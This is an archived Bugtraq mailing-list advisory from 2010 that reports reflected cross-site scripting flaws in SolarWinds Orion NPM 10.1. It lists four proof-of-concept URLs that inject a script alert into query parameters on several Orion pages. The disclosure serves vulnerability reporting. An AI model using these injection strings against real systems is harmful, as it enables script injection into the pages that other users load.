[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Multiple XSS in Solarwinds Orion NPM 10.1

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple XSS in Solarwinds Orion NPM 10.1
From: John Blakley <john.blakley@xxxxxxxxx>
Date: Tue, 7 Dec 2010 11:16:48 -0600

Values placed in the URI of the browser are rendered correctly. Orion NPM
10.1 has just been released, so there is no known fix available as of yet.

Examples:

Most "variable=" that I've checked are vulnerable:

http://<server>/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-231270=0225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E

http://<server>/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E

http://<server>/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%2=7test%27%29%3C/script%3E&I:100&view=InterfaceDetails

http://<server>/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo=

If you need more information please let me know. Is there a template I
should fill out for these reports?

If this is published, please publish under x0skel and NOT my name....

Thanks,
John

Prev by Date: Re: [Full-disclosure] Linux kernel exploit
Next by Date: LFI in Exponent CMS
Previous by thread: Re: [Full-disclosure] Linux kernel exploit
Next by thread: [ MDVSA-2010:249 ] clamav
Index(es):
- Date
- Thread